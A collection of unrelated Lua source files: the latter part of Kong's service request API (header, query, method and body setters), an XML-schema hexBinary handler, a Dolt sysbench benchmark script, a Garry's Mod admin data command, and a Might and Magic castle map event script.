-- For a higher-level function to set the query string from a Lua table of
-- arguments, see `kong.service.request.set_query()`.
-- @function kong.service.request.set_raw_query
-- @phases `rewrite`, `access`
-- @tparam string query The raw querystring. Example:
-- `"foo=bar&bla&baz=hello%20world"`.
-- @return Nothing; throws an error on invalid inputs.
-- @usage
-- kong.service.request.set_raw_query("zzz&bar=baz&bar=bla&bar&blo=&foo=hello%20world")
request.set_raw_query = function(query)
check_phase(access_and_rewrite)
if type(query) ~= "string" then
error("query must be a string", 2)
end
ngx.req.set_uri_args(query)
end
do
local accepted_methods = {
["GET"] = ngx.HTTP_GET,
["HEAD"] = ngx.HTTP_HEAD,
["PUT"] = ngx.HTTP_PUT,
["POST"] = ngx.HTTP_POST,
["DELETE"] = ngx.HTTP_DELETE,
["OPTIONS"] = ngx.HTTP_OPTIONS,
["MKCOL"] = ngx.HTTP_MKCOL,
["COPY"] = ngx.HTTP_COPY,
["MOVE"] = ngx.HTTP_MOVE,
["PROPFIND"] = ngx.HTTP_PROPFIND,
["PROPPATCH"] = ngx.HTTP_PROPPATCH,
["LOCK"] = ngx.HTTP_LOCK,
["UNLOCK"] = ngx.HTTP_UNLOCK,
["PATCH"] = ngx.HTTP_PATCH,
["TRACE"] = ngx.HTTP_TRACE,
}
---
-- Sets the HTTP method for the request to the service.
--
-- @function kong.service.request.set_method
-- @phases `rewrite`, `access`
-- @tparam string method The method string, which must be in all
-- uppercase. Supported values are: `"GET"`, `"HEAD"`, `"PUT"`, `"POST"`,
-- `"DELETE"`, `"OPTIONS"`, `"MKCOL"`, `"COPY"`, `"MOVE"`, `"PROPFIND"`,
-- `"PROPPATCH"`, `"LOCK"`, `"UNLOCK"`, `"PATCH"`, or `"TRACE"`.
-- @return Nothing; throws an error on invalid inputs.
-- @usage
-- kong.service.request.set_method("DELETE")
request.set_method = function(method)
check_phase(access_and_rewrite)
if type(method) ~= "string" then
error("method must be a string", 2)
end
local method_id = accepted_methods[method]
if not method_id then
error("invalid method: " .. method, 2)
end
ngx.req.set_method(method_id)
end
end
---
-- Set the query string of the request to the Service.
--
-- Unlike `kong.service.request.set_raw_query()`, the `query` argument must be a
-- table in which each key is a string (corresponding to an argument's name), and
-- each value is either a boolean, a string, or an array of strings or booleans.
-- Additionally, all string values will be URL-encoded.
--
-- The resulting query string contains keys in their lexicographical order. The
-- order of entries within the same key (when values are given as an array) is
-- retained.
--
-- If further control of the query string generation is needed, a raw query
-- string can be given as a string with `kong.service.request.set_raw_query()`.
--
-- @function kong.service.request.set_query
-- @phases `rewrite`, `access`
-- @tparam table args A table where each key is a string (corresponding to an
-- argument name), and each value is either a boolean, a string, or an array of
-- strings or booleans. Any string values given are URL-encoded.
-- @return Nothing; throws an error on invalid inputs.
-- @usage
-- kong.service.request.set_query({
-- foo = "hello world",
-- bar = {"baz", "bla", true},
-- zzz = true,
-- blo = ""
-- })
-- -- Produces the following query string:
-- -- bar=baz&bar=bla&bar&blo=&foo=hello%20world&zzz
request.set_query = function(args)
check_phase(access_and_rewrite)
if type(args) ~= "table" then
error("args must be a table", 2)
end
local querystring, err = make_ordered_args(args)
if not querystring then
error(err, 2) -- type error inside the table
end
ngx.req.set_uri_args(querystring)
end
local set_authority
if ngx.config.subsystem ~= "stream" then
set_authority = require("resty.kong.grpc").set_authority
end
---
-- Sets a header in the request to the Service with the given value. Any existing header
-- with the same name will be overridden.
--
-- If the `header` argument is `"host"` (case-insensitive), then this also
-- sets the SNI of the request to the Service.
--
-- @function kong.service.request.set_header
-- @phases `rewrite`, `access`, `balancer`
-- @tparam string header The header name. Example: "X-Foo".
-- @tparam string|boolean|number value The header value. Example: "hello world".
-- @return Nothing; throws an error on invalid inputs.
-- @usage
-- kong.service.request.set_header("X-Foo", "value")
request.set_header = function(header, value)
check_phase(access_rewrite_balancer)
validate_header(header, value)
if string_lower(header) == "host" then
ngx_var.upstream_host = value
end
if string_lower(header) == ":authority" then
if ngx_var.upstream_scheme == "grpc" or
ngx_var.upstream_scheme == "grpcs"
then
return set_authority(value)
else
return nil, "cannot set :authority pseudo-header on non-grpc requests"
end
end
ngx.req.set_header(header, normalize_header(value))
end
---
-- Adds a request header with the given value to the request to the Service. Unlike
-- `kong.service.request.set_header()`, this function doesn't remove any existing
-- headers with the same name. Instead, several occurrences of the header will be
-- present in the request. The order in which headers are added is retained.
--
-- @function kong.service.request.add_header
-- @phases `rewrite`, `access`
-- @tparam string header The header name. Example: "Cache-Control".
-- @tparam string|number|boolean value The header value. Example: "no-cache".
-- @return Nothing; throws an error on invalid inputs.
-- @usage
-- kong.service.request.add_header("Cache-Control", "no-cache")
-- kong.service.request.add_header("Cache-Control", "no-store")
request.add_header = function(header, value)
check_phase(access_and_rewrite)
validate_header(header, value)
if string_lower(header) == "host" then
ngx_var.upstream_host = value
end
local headers = ngx.req.get_headers()[header]
if type(headers) ~= "table" then
headers = { headers }
end
table_insert(headers, normalize_header(value))
ngx.req.set_header(header, headers)
end
---
-- Removes all occurrences of the specified header from the request to the Service.
-- @function kong.service.request.clear_header
-- @phases `rewrite`, `access`
-- @tparam string header The header name. Example: "X-Foo".
-- @return Nothing; throws an error on invalid inputs.
-- The function does not throw an error if no header was removed.
-- @usage
-- kong.service.request.set_header("X-Foo", "foo")
-- kong.service.request.add_header("X-Foo", "bar")
-- kong.service.request.clear_header("X-Foo")
-- -- from here onwards, no X-Foo headers will exist in the request
request.clear_header = function(header)
check_phase(access_and_rewrite)
if type(header) ~= "string" then
error("header must be a string", 2)
end
ngx.req.clear_header(header)
end
---
-- Sets the headers of the request to the Service. Unlike
-- `kong.service.request.set_header()`, the `headers` argument must be a table in
-- which each key is a string (corresponding to a header's name), and each value
-- is a string, or an array of strings.
--
-- The resulting headers are produced in lexicographical order. The order of
-- entries with the same name (when values are given as an array) is retained.
--
-- This function overrides any existing header bearing the same name as those
-- specified in the `headers` argument. Other headers remain unchanged.
--
-- If the `"Host"` header is set (case-insensitive), then this also sets
-- the SNI of the request to the Service.
-- @function kong.service.request.set_headers
-- @phases `rewrite`, `access`
-- @tparam table headers A table where each key is a string containing a header name
-- and each value is either a string or an array of strings.
-- @return Nothing; throws an error on invalid inputs.
-- @usage
-- kong.service.request.set_header("X-Foo", "foo1")
-- kong.service.request.add_header("X-Foo", "foo2")
-- kong.service.request.set_header("X-Bar", "bar1")
-- kong.service.request.set_headers({
-- ["X-Foo"] = "foo3",
-- ["Cache-Control"] = { "no-store", "no-cache" },
-- ["Bla"] = "boo"
-- })
--
-- -- Will add the following headers to the request, in this order:
-- -- X-Bar: bar1
-- -- Bla: boo
-- -- Cache-Control: no-store
-- -- Cache-Control: no-cache
-- -- X-Foo: foo3
request.set_headers = function(headers)
check_phase(access_and_rewrite)
if type(headers) ~= "table" then
error("headers must be a table", 2)
end
-- Check for type errors first
validate_headers(headers)
-- Now we can use ngx.req.set_header without pcall
for k, v in pairs(headers) do
if string_lower(k) == "host" then
ngx_var.upstream_host = v
end
ngx.req.set_header(k, normalize_multi_header(v))
end
end
---
-- Sets the body of the request to the Service.
--
-- The `body` argument must be a string and will not be processed in any way.
-- This function also sets the `Content-Length` header appropriately. To set an
-- empty body, you can provide an empty string (`""`) to this function.
--
-- For a higher-level function to set the body based on the request content type,
-- see `kong.service.request.set_body()`.
-- @function kong.service.request.set_raw_body
-- @phases `rewrite`, `access`
-- @tparam string body The raw body.
-- @return Nothing; throws an error on invalid inputs.
-- @usage
-- kong.service.request.set_raw_body("Hello, world!")
request.set_raw_body = function(body)
check_phase(access_and_rewrite)
if type(body) ~= "string" then
error("body must be a string", 2)
end
-- TODO Can we get the body size limit configured for Kong and check for
-- length based on that, and fail gracefully before attempting to set
-- the body?
-- Ensure client request body has been read.
-- This function is a nop if body has already been read,
-- and necessary to write the request to the service if it has not.
ngx.req.read_body()
ngx.req.set_body_data(body)
end
do
local QUOTE = string_byte('"')
local set_body_handlers = {
[CONTENT_TYPE_POST] = function(args, mime)
if type(args) ~= "table" then
error("args must be a table", 3)
end
local querystring, err = make_ordered_args(args)
if not querystring then
error(err, 3) -- type error inside the table
end
return querystring, mime
end,
[CONTENT_TYPE_JSON] = function(args, mime)
local encoded, err = cjson.encode(args)
if not encoded then
error(err, 3)
end
return encoded, mime
end,
[CONTENT_TYPE_FORM_DATA] = function(args, mime)
local keys = {}
local boundary
local boundary_ok = false
local at = string_find(mime, "boundary=", 1, true)
if at then
at = at + 9
if string_byte(mime, at) == QUOTE then
local till = string_find(mime, '"', at + 1, true)
boundary = string_sub(mime, at + 1, till - 1)
else
boundary = string_sub(mime, at)
end
boundary_ok = true
end
-- This will only loop in the unlikely event that the
-- boundary is not acceptable and needs to be regenerated.
repeat
if not boundary_ok then
boundary = tostring(math.random(1e10))
boundary_ok = true
end
local boundary_check = "\n--" .. boundary
local i = 1
for k, v in pairs(args) do
if type(k) ~= "string" then
error(("invalid key %q: got %s, " ..
"expected string"):format(k, type(k)), 3)
end
local tv = type(v)
if tv ~= "string" and tv ~= "number" and tv ~= "boolean" then
error(("invalid value %q: got %s, " ..
"expected string, number or boolean"):format(k, tv), 3)
end
keys[i] = k
i = i + 1
if string_find(tostring(v), boundary_check, 1, true) then
boundary_ok = false
end
end
until boundary_ok
table_sort(keys)
local out = {}
local i = 1
for _, k in ipairs(keys) do
out[i] = "--"
out[i + 1] = boundary
out[i + 2] = "\r\n"
out[i + 3] = 'Content-Disposition: form-data; name="'
out[i + 4] = k
out[i + 5] = '"\r\n\r\n'
local v = args[k]
out[i + 6] = v
out[i + 7] = "\r\n"
i = i + 8
end
out[i] = "--"
out[i + 1] = boundary
out[i + 2] = "--\r\n"
local output = table.concat(out)
return output, CONTENT_TYPE_FORM_DATA .. "; boundary=" .. boundary
end,
}
---
-- Sets the body of the request to the Service. Unlike
-- `kong.service.request.set_raw_body()`, the `args` argument must be a table, and
-- is encoded with a MIME type. The encoding MIME type can be specified in
-- the optional `mimetype` argument, or if left unspecified, is chosen based
-- on the `Content-Type` header of the client's request.
--
-- Behavior based on MIME type in the `Content-Type` header:
-- * `application/x-www-form-urlencoded`: Encodes the arguments as
-- form-encoded. Keys are produced in lexicographical
-- order. The order of entries within the same key (when values are
-- given as an array) is retained. Any string values given are URL-encoded.
--
-- * `multipart/form-data`: Encodes the arguments as multipart form data.
--
-- * `application/json`: Encodes the arguments as JSON (same as
-- `kong.service.request.set_raw_body(json.encode(args))`). Lua types are
-- converted to matching JSON types.
--
-- If the MIME type is none of the above, this function returns `nil` and
-- an error message indicating the body could not be encoded.
--
-- If the `mimetype` argument is specified, the `Content-Type` header is
-- set accordingly in the request to the Service.
--
-- If further control of the body generation is needed, a raw body can be given as
-- a string with `kong.service.request.set_raw_body()`.
--
-- @function kong.service.request.set_body
-- @phases `rewrite`, `access`
-- @tparam table args A table with data to be converted to the appropriate format
-- and stored in the body.
-- @tparam[opt] string mimetype can be one of:
-- @treturn boolean|nil `true` on success, `nil` otherwise.
-- @treturn string|nil `nil` on success, an error message in case of error.
-- Throws an error on invalid inputs.
-- @usage
-- kong.service.set_header("application/json")
-- local ok, err = kong.service.request.set_body({
-- name = "John Doe",
-- age = 42,
-- numbers = {1, 2, 3}
-- })
--
-- -- Produces the following JSON body:
-- -- { "name": "John Doe", "age": 42, "numbers":[1, 2, 3] }
--
-- local ok, err = kong.service.request.set_body({
-- foo = "hello world",
-- bar = {"baz", "bla", true},
-- zzz = true,
-- blo = ""
-- }, "application/x-www-form-urlencoded")
--
-- -- Produces the following body:
-- -- bar=baz&bar=bla&bar&blo=&foo=hello%20world&zzz
request.set_body = function(args, mime)
check_phase(access_and_rewrite)
if type(args) ~= "table" then
error("args must be a table", 2)
end
if mime and type(mime) ~= "string" then
error("mime must be a string", 2)
end
if not mime then
mime = ngx.req.get_headers()[CONTENT_TYPE]
if not mime then
return nil, "content type was neither explicitly given " ..
"as an argument or received as a header"
end
end
local boundaryless_mime = mime
local s = string_find(mime, ";", 1, true)
if s then
boundaryless_mime = string_sub(mime, 1, s - 1)
end
local handler_fn = set_body_handlers[boundaryless_mime]
if not handler_fn then
error("unsupported content type " .. mime, 2)
end
-- Ensure client request body has been read.
-- This function is a nop if body has already been read,
-- and necessary to write the request to the service if it has not.
ngx.req.read_body()
local body, content_type = handler_fn(args, mime)
ngx.req.set_body_data(body)
ngx.req.set_header(CONTENT_TYPE, content_type)
return true
end
end
if ngx.config.subsystem == "stream" then
local disable_proxy_ssl = require("resty.kong.tls").disable_proxy_ssl
---
-- Disables the TLS handshake to upstream for [ngx\_stream\_proxy\_module](https://nginx.org/en/docs/stream/ngx_stream_proxy_module.html).
-- This overrides the [proxy\_ssl](https://nginx.org/en/docs/stream/ngx_stream_proxy_module.html#proxy_ssl) directive, effectively setting it to `off`
-- for the current stream session.
--
-- Once this function has been called, it is not possible to re-enable TLS handshake for the current session.
--
-- @function kong.service.request.disable_tls
-- @phases `preread`, `balancer`
-- @treturn boolean|nil `true` if the operation succeeded, `nil` if an error occurred.
-- @treturn string|nil An error message describing the error if there was one.
-- @usage
-- local ok, err = kong.service.request.disable_tls()
-- if not ok then
-- -- do something with error
-- end
request.disable_tls = function()
check_phase(preread_and_balancer)
return disable_proxy_ssl()
end
end
return request
end
return {
new = new,
}
|
local ffi = require("ffi");
local facets = require("lua_schema.facets");
local basic_stuff = require("lua_schema.basic_stuff");
local error_handler = require("lua_schema.error_handler");
local __hexBinary_handler_class = {}
local core_utils = require("lua_schema.core_utils");
__hexBinary_handler_class.type_name = 'hexBinary';
__hexBinary_handler_class.datatype = 'binary';
function __hexBinary_handler_class:is_deserialized_valid(x)
local s = tostring(x);
return self:is_valid(s);
end
function __hexBinary_handler_class:is_valid(s)
if((s ~= nil) and (not ffi.istype("hex_data_s_type", s))) then
error_handler.raise_validation_error(-1,
"Field: {"..error_handler.get_fieldpath().."} is not a valid xsd:hexBinary", debug.getinfo(1));
return false
end
if (self.facets ~= nil) then
if (not self.facets:check(s)) then
return false;
end
end
return true;
end
function __hexBinary_handler_class:to_xmlua(ns, s)
if (false == self:is_valid(s)) then
local msv = error_handler.reset_init();
error(msv.status.error_message);
end
local status, ed = pcall(core_utils.hex_encode, s);
if (not status) then
error_handler.raise_validation_error(-1,
"Field: {"..error_handler.get_fieldpath().."} is not a valid xsd:hexBinary", debug.getinfo(1));
local msv = error_handler.reset_init();
error(msv.status.error_message);
end
return ed;
end
function __hexBinary_handler_class:to_schema_type(ns, s)
if (false == basic_stuff.is_simple_type(s)) then
error_handler.raise_validation_error(-1,
"Field: {"..error_handler.get_fieldpath().."} is not a valid xsd:hexBinary", debug.getinfo(1));
error("Field: {"..error_handler.get_fieldpath().."} is not a valid xsd:hexBinary");
end
local s_s = self.facets:process_white_space(s);
local status, dd = pcall(core_utils.hex_decode, s_s);
if (not status) then
error_handler.raise_validation_error(-1,
"Field: {"..error_handler.get_fieldpath().."} is not a valid xsd:hexBinary", debug.getinfo(1));
local msv = error_handler.reset_init();
error(msv.status.error_message);
end
return dd;
end
function __hexBinary_handler_class:to_cjson_struct(ns, s)
if (false == self:is_valid(s)) then
local msv = error_handler.reset_init();
error(msv.status.error_message);
end
local status, ed = pcall(core_utils.hex_encode, s);
if (not status) then
error_handler.raise_validation_error(-1,
"Field: {"..error_handler.get_fieldpath().."} is not a valid xsd:hexBinary", debug.getinfo(1));
local msv = error_handler.reset_init();
error(msv.status.error_message);
end
return ed;
end
function __hexBinary_handler_class:to_type(ns, i)
if ('string' ~= type(i)) then
error_handler.raise_validation_error(-1,
"Field: {"..error_handler.get_fieldpath().."} is not a valid xsd:hexBinary", debug.getinfo(1));
error("Field: {"..error_handler.get_fieldpath().."} is not a valid xsd:hexBinary");
end
local s = self:to_schema_type(ns, i);
if (false == self:is_valid(s)) then
local msv = error_handler.reset_init();
error(msv.status.error_message);
end
return s;
end
function __hexBinary_handler_class:new(i)
return self:to_type(nil, i);
end
local mt = { __index = __hexBinary_handler_class; } ;
local _factory = {};
function _factory:instantiate()
local o = {};
o = setmetatable(o, mt);
o.facets = facets.new(mt.__index);
o.facets.white_space = 'collapse';
return o;
end
return _factory;
|
-- -----------------------------------------------------------------------------
-- Common code for dolt benchmarks.
-- -----------------------------------------------------------------------------
function init()
assert(event ~= nil, "this script is meant to be included by other OLTP scripts and should not be called directly.")
end
if sysbench.cmdline.command == nil then
error("Command is required. Supported commands: prepare, warmup, run, cleanup, help")
end
-- Command line options
sysbench.cmdline.options = {
table_size = {"Number of rows per table", 10000},
create_table_options = {"Extra CREATE TABLE options", ""},
}
-- Prepare the dataset. This command supports parallel execution, i.e. will
-- benefit from executing with --threads > 1 as long as --tables > 1
function cmd_prepare()
local drv = sysbench.sql.driver()
local con = drv:connect()
print("Creating table 'sbtest1'")
local create_query = string.format( [[
CREATE TABLE sbtest1 (
id INT NOT NULL,
tiny_int_col TINYINT NOT NULL,
unsigned_tiny_int_col TINYINT UNSIGNED NOT NULL,
small_int_col SMALLINT NOT NULL,
unsigned_small_int_col SMALLINT UNSIGNED NOT NULL,
medium_int_col MEDIUMINT NOT NULL,
unsigned_medium_int_col MEDIUMINT UNSIGNED NOT NULL,
int_col INT NOT NULL,
unsigned_int_col INT UNSIGNED NOT NULL,
big_int_col BIGINT NOT NULL,
unsigned_big_int_col BIGINT UNSIGNED NOT NULL,
decimal_col DECIMAL NOT NULL,
float_col FLOAT NOT NULL,
double_col DOUBLE NOT NULL,
bit_col BIT NOT NULL,
char_col CHAR NOT NULL,
var_char_col VARCHAR(64) NOT NULL,
tiny_text_col TINYTEXT NOT NULL,
text_col TEXT NOT NULL,
medium_text_col MEDIUMTEXT NOT NULL,
long_text_col LONGTEXT NOT NULL,
enum_col ENUM('val0', 'val1', 'val2') NOT NULL,
set_col SET('val0', 'val1', 'val2') NOT NULL,
date_col DATE NOT NULL,
time_col TIME NOT NULL,
datetime_col DATETIME NOT NULL,
timestamp_col TIMESTAMP NOT NULL,
year_col YEAR NOT NULL,
PRIMARY KEY(id),
INDEX (big_int_col)
); ]] .. sysbench.opt.create_table_options)
con:query(create_query)
if (sysbench.opt.table_size > 0) then
print(string.format("Inserting %d records into 'sbtest1'", sysbench.opt.table_size))
end
local query = [[INSERT INTO sbtest1
(id, tiny_int_col, unsigned_tiny_int_col, small_int_col, unsigned_small_int_col, medium_int_col, unsigned_medium_int_col, int_col, unsigned_int_col, big_int_col, unsigned_big_int_col, decimal_col, float_col, double_col, bit_col, char_col, var_char_col, tiny_text_col, text_col, medium_text_col, long_text_col, enum_col, set_col, date_col, time_col, datetime_col, timestamp_col, year_col)
VALUES
]]
local str_vals = {"val0", "val1", "val2"}
math.randomseed(0)
con:bulk_insert_init(query)
for i = 1, sysbench.opt.table_size do
local row_values = "(" .. i .. "," .. -- id
math.random(-128, 127) .. "," .. -- tiny_int_col
math.random(0, 255) .. "," .. -- unsigned_tiny_int_col
math.random(-32768, 32767) .. "," .. -- small_int_col
math.random(0, 65535) .. "," .. -- unsigned_small_int_col
math.random(-8388608, 8388607) .. "," .. -- medium_int_col
math.random(0, 16777215) .. "," .. -- unsigned_medium_int_col
math.random(-2147483648, 2147483647) .. "," .. -- int_col
math.random(0, 4294967295) .. "," .. -- unsigned_int_col
math.random(-4611686018427387904, 4611686018427387903) .. "," .. -- big_int_col
math.random(0, 9223372036854775807) .. "," .. -- unsigned_big_int_col
math.random() .. "," .. -- decimal_col
math.random() .. "," .. -- float_col
math.random() .. "," .. -- double_col
math.random(0, 1) .. "," .. -- bit_col
"'" .. string.char(math.random(0x30, 0x5A)) .. "'" .. "," .. -- char_col
"'" .. str_vals[math.random(1, 3)] .. "'" .. "," .. -- var_char_col
"'" .. str_vals[math.random(1, 3)] .. "'" .. "," .. -- tiny_text_col
"'" .. str_vals[math.random(1, 3)] .. "'" .. "," .. -- text_col
"'" .. str_vals[math.random(1, 3)] .. "'" .. "," .. -- medium_text_col
"'" .. str_vals[math.random(1, 3)] .. "'" .. "," .. -- long_text_col
"'" .. str_vals[math.random(1, 3)] .. "'" .. "," .. -- enum_col
"'" .. str_vals[math.random(1, 3)] .. "'" .. "," .. -- set_col
"'2020-0" .. math.random(1, 9) .. "-" .. math.random(10, 28) .. "'" .. "," .. -- date_col
"'0" .. math.random(1, 9) .. ":" .. math.random(10, 59) .. ":00'" .. "," .. -- time_col
"'2020-0" .. math.random(1, 9) .. "-" .. math.random(10, 28) .. " 0" .. math.random(1, 9) .. ":" .. math.random(10, 59) .. ":00'" .. "," .. -- datetime_col
"'2020-0" .. math.random(1, 9) .. "-" .. math.random(10, 28) .. " 0" .. math.random(1, 9) .. ":" .. math.random(10, 59) .. ":00'" .. "," .. -- timestamp_col
math.random(1901, 2155) .. ")" -- year_col
con:bulk_insert_next(row_values)
end
con:bulk_insert_done()
end
-- Implement parallel prepare and warmup commands, define 'prewarm' as an alias
-- for 'warmup'
sysbench.cmdline.commands = {
prepare = {cmd_prepare, sysbench.cmdline.PARALLEL_COMMAND},
}
local t = sysbench.sql.type
function thread_init()
drv = sysbench.sql.driver()
con = drv:connect()
end
function thread_done()
con:disconnect()
end
function cleanup()
local drv = sysbench.sql.driver()
local con = drv:connect()
print("Dropping table 'sbtest1'")
con:query("DROP TABLE IF EXISTS sbtest1")
end
|
/*--------------------------------------------------------------------------\
| THIS ENTIRE PLUGIN IS CREATED BY VIOMI |
| PLEASE DO NOT COPY OR SELL ANY CODE IN HERE WITHOUT PERMISSION FROM VIOMI |
| Contact: viomi@openmailbox.org |
\--------------------------------------------------------------------------*/
PLUGIN = PLUGIN;
local COMMAND = Clockwork.command:New("MyData");
COMMAND.tip = "View data about yourself, if you're an admin.";
COMMAND.text = "<none>";
COMMAND.flags = CMD_DEFAULT;
COMMAND.arguments = 0;
-- Called when the command has been run.
function COMMAND:OnRun(player)
if (player:IsSuperAdmin() or player:IsAdmin()) then
Clockwork.datastream:Start( player, "EditData", { player, player:GetCharacterData("combinedata") } );
player.editDataAuthorised = player;
else
Clockwork.player:Notify(player, "You are not an Admin.");
end;
end;
COMMAND:Register(); |
local TXT = Localize{
[0] = " ",
[1] = "Door",
[2] = "Leave Castle Harmondale",
[3] = "Chest",
[4] = "Button",
[5] = "Lever",
[6] = "Vault",
[7] = "Cabinet",
[8] = "Switch",
[9] = "Strange Torch",
[10] = "Bookcase",
[11] = "Arnold's Super Protein Drink",
[12] = "Phasing Cauldron",
[13] = "Elemental Totem",
[14] = "You Successfully disarm the trap",
[15] = "",
[16] = "Take a Drink",
[17] = "Not Very Refreshing",
[18] = "Refreshing",
[19] = "",
[20] = "Enter the Throne Room",
[21] = "The door is blocked",
[22] = "This cabinet requires a Blue Dragon's Key.",
}
table.copy(TXT, evt.str, true)
Game.MapEvtLines:RemoveEvent(1)
evt.map[1] = function() -- function events.LoadMap()
if evt.Cmp{"QBits", Value = 610} then -- Built Castle to Level 2 (rescued dwarf guy)
evt.SetDoorState{Id = 35, State = 0}
evt.SetSprite{SpriteId = 10, Visible = 0, Name = "0"}
evt.SetTexture{Facet = 4, Name = "tfb09r1a"}
evt.SetTexture{Facet = 5, Name = "tfb09r1b"}
evt.SetTexture{Facet = 6, Name = "tfb09r1c"}
evt.SetTexture{Facet = 7, Name = "tfb09r1d"}
evt.SetTexture{Facet = 8, Name = "tfb09r1e"}
evt.SetTexture{Facet = 9, Name = "tfb09r1f"}
evt.SetTexture{Facet = 10, Name = "tfb09r1g"}
evt.SetTexture{Facet = 11, Name = "tfb09r1h"}
evt.SetTexture{Facet = 12, Name = "tfb09r1i"}
evt.SetTexture{Facet = 13, Name = "tfb09r1j"}
else
evt.SetTexture{Facet = 1, Name = "ch1b1"}
evt.SetTexture{Facet = 3, Name = "ch1b1"}
evt.SetTexture{Facet = 14, Name = "ch1b1el"}
evt.SetTexture{Facet = 15, Name = "ch1b1er"}
evt.SetTexture{Facet = 16, Name = "ch1b1"}
evt.SetTexture{Facet = 17, Name = "ch1b1"}
evt.SetTexture{Facet = 19, Name = "ch1b1"}
evt.SetTexture{Facet = 20, Name = "ch1b1"}
end
if evt.Cmp{"QBits", Value = 614} then -- Completed Proving Grounds without killing a single creature
evt.SetTexture{Facet = 19, Name = "wizh-a"}
evt.SetTexture{Facet = 20, Name = "wizh-b"}
else
if not evt.Cmp{"QBits", Value = 641} then -- Completed Breeding Pit.
return
end
evt.SetTexture{Facet = 19, Name = "nechuma"}
evt.SetTexture{Facet = 20, Name = "nechumb"}
end
evt.SetDoorState{Id = 36, State = 0}
evt.SetFacetBit{Id = 3, Bit = const.FacetBits.Invisible, On = false}
end
events.LoadMap = evt.map[1].last
Game.MapEvtLines:RemoveEvent(2)
evt.map[2] = function() -- function events.LeaveMap()
if not evt.Cmp{"QBits", Value = 647} then -- Player castle goblins are all dead
if evt.CheckMonstersKilled{CheckType = 1, Id = 56, Count = 0} then
evt.ForPlayer(-- ERROR: Const not found
"All")
evt.Set{"QBits", Value = 647} -- Player castle goblins are all dead
end
end
end
events.LeaveMap = evt.map[2].last
evt.hint[3] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(3)
evt.map[3] = function()
evt.SetDoorState{Id = 3, State = 0}
end
evt.hint[4] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(4)
evt.map[4] = function()
evt.SetDoorState{Id = 4, State = 0}
end
evt.hint[5] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(5)
evt.map[5] = function()
evt.SetDoorState{Id = 5, State = 0}
end
evt.hint[6] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(6)
evt.map[6] = function()
evt.SetDoorState{Id = 6, State = 0}
end
evt.hint[7] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(7)
evt.map[7] = function()
evt.SetDoorState{Id = 7, State = 0}
end
evt.hint[8] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(8)
evt.map[8] = function()
evt.SetDoorState{Id = 8, State = 0}
end
evt.hint[9] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(9)
evt.map[9] = function()
evt.SetDoorState{Id = 9, State = 0}
end
evt.hint[10] = evt.str[100] -- ""
Game.MapEvtLines:RemoveEvent(10)
evt.map[10] = function()
evt.SetDoorState{Id = 10, State = 1}
end
evt.hint[11] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(11)
evt.map[11] = function()
evt.SetDoorState{Id = 11, State = 0}
end
evt.hint[12] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(12)
evt.map[12] = function()
evt.SetDoorState{Id = 12, State = 0}
end
evt.hint[13] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(13)
evt.map[13] = function()
evt.SetDoorState{Id = 13, State = 0}
end
evt.hint[14] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(14)
evt.map[14] = function()
evt.SetDoorState{Id = 14, State = 0}
end
Game.MapEvtLines:RemoveEvent(15)
evt.map[15] = function()
if not evt.Cmp{"QBits", Value = 614} then -- Completed Proving Grounds without killing a single creature
if not evt.Cmp{"QBits", Value = 641} then -- Completed Breeding Pit.
return
end
end
evt.SetDoorState{Id = 15, State = 0}
end
Game.MapEvtLines:RemoveEvent(16)
evt.map[16] = function()
if not evt.Cmp{"QBits", Value = 614} then -- Completed Proving Grounds without killing a single creature
if not evt.Cmp{"QBits", Value = 641} then -- Completed Breeding Pit.
return
end
end
evt.SetDoorState{Id = 16, State = 0}
end
Game.MapEvtLines:RemoveEvent(17)
evt.map[17] = function()
evt.SetDoorState{Id = 17, State = 0}
end
evt.hint[18] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(18)
evt.map[18] = function()
evt.SetDoorState{Id = 18, State = 0}
evt.SetDoorState{Id = 19, State = 0}
end
evt.hint[19] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(19)
evt.map[19] = function()
evt.SetDoorState{Id = 20, State = 0}
evt.SetDoorState{Id = 21, State = 0}
end
evt.hint[20] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(20)
evt.map[20] = function()
evt.SetDoorState{Id = 22, State = 0}
end
evt.hint[21] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(21)
evt.map[21] = function()
evt.SetDoorState{Id = 23, State = 0}
end
evt.hint[22] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(22)
evt.map[22] = function()
evt.SetDoorState{Id = 24, State = 0}
end
evt.hint[23] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(23)
evt.map[23] = function()
evt.SetDoorState{Id = 25, State = 0}
end
evt.hint[24] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(24)
evt.map[24] = function()
evt.SetDoorState{Id = 26, State = 0}
end
evt.hint[25] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(25)
evt.map[25] = function()
evt.SetDoorState{Id = 27, State = 0}
end
Game.MapEvtLines:RemoveEvent(26)
evt.map[26] = function()
evt.SetDoorState{Id = 28, State = 0}
end
evt.hint[27] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(27)
evt.map[27] = function()
evt.SetDoorState{Id = 29, State = 0}
end
evt.hint[28] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(28)
evt.map[28] = function()
evt.SetDoorState{Id = 30, State = 0}
end
evt.hint[29] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(29)
evt.map[29] = function()
evt.SetDoorState{Id = 31, State = 0}
end
evt.hint[30] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(30)
evt.map[30] = function()
evt.SetDoorState{Id = 32, State = 0}
end
evt.hint[31] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(31)
evt.map[31] = function()
evt.SetDoorState{Id = 33, State = 0}
end
